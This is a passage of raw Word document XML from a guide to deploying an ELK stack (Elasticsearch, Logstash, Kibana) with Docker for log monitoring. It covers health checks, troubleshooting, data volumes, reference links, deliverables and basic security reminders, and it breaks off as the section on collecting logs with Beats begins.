        <w:t xml:space="preserve">This pipeline will accept </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">/Beats input at port 5044. We’ll configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> in Step 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A7389" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="07005D3B">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F0C6F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2.6 Verify ELK is healthy (checks to perform)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400CEAF8" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker compose </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> — all main containers up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9F1478" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>curl -u elastic:&lt;password&gt; -k https://localhost:9200 — Elasticsearch responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E11A68" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Kibana UI reachable at http://&lt;host&gt;:5601.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEE750" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">In Kibana → </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stack Management → Index Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> you can view indices. At this point you may see system indices like .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>*.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCD89B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="340543F3">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE858E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2.7 Troubleshooting common issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE66ADB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Elasticsearch container fails to start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559E3E55" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Check logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA1680" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker compose logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --tail 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCDFB41" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Common causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C9C6B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> not set — fix with command in Step 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74798A5D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Insufficient RAM — reduce ES_JAVA_OPTS or allocate more memory to VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BDF549" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Disk full — ensure enough disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377FA1E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Kibana shows “Waiting for Elasticsearch”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC30977" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t>Check Elasticsearch is up and healthy. Check Kibana logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614F1FC0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker compose logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --tail 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381FCF7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Logstash pipeline errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD25F02" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Check Logstash logs and config syntax. Use docker compose logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> --tail 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9389F2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Ensure pipeline file names end with .conf. Grok patterns must match actual messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FE7ED" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="490C9EDD">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53112EDC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2.8 Persistent storage and data safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F9DDD" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Elasticsearch stores indices under the configured data path within the container volume. Make sure to map to host disk with enough capacity (50+ GB for POC depending on data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04980F5D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Use docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> volumes or host bind mounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589221B9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924A639" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>esdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09C7C1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    driver: local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2840F215" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93E798" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28957F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC1CD4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">      - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>esdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EAB5DF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">For production, configure snapshots to remote storage (S3): </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-snapshots.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F502971" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="0437591C">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152B097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2.9 Next steps after ELK running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D50D7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> on your test VMs and point them to Logstash (we’ll cover details in Step 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D234CF4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Create a small Logstash pipeline (we added example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>test.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>) to ensure Beats can talk to Logstash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C086E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Practice viewing incoming logs in Kibana Discover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC2AFF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="5A622BF6">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A339C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2.10 Useful links for Step 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA9946" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker-elk repo (starter): </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/deviantony/docker-elk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2436F5B6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Elasticsearch Docker notes &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B7D1484" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Kibana docs &amp; install: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3888FE25" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Logstash docs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A8AA462" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t>Docker install (Ubuntu): https://docs.docker.com/engine/install/ubuntu/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D146BA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docker Compose plugin: https://docs.docker.com/compose/cli-command/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93229C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Elasticsearch JVM tuning: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/heap-size.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DA3C117" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="033D5D54">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E338A77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2.11 Deliverables for Step 2 (what to commit / mark done)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53BB7D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>docker-elk cloned and running (docker compose up -d) on ELK VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C9675" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Kibana accessible at http://&lt;ELK_HOST&gt;:5601 (or via SSH tunnel).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34DD7E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Basic Logstash pipeline </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/pipeline/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>test.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> created and Logstash restarted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922268F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ELK health check curl output stored in docs/elk-health.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2DF21E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Screenshots of Kibana home page saved to repo docs/screenshots/kibana-home.png.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE759D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="643214A3">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2E6AC" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.12 Security reminder (do now)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B817C6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">If your ELK host is on a network, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>block incoming ports</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> (9200, 5601) from public internet. Use firewall or cloud security group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674BEC0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Store passwords offline; don’t push secrets to GitHub. Add .env to .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE1552E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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3 — Log Collection via Beats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D9D4D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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD879C6" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">To collect logs (system logs, authentication logs, network traffic, PowerShell commands, etc.) from multiple machines and send them to </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logstash</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">, which then forwards them to </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
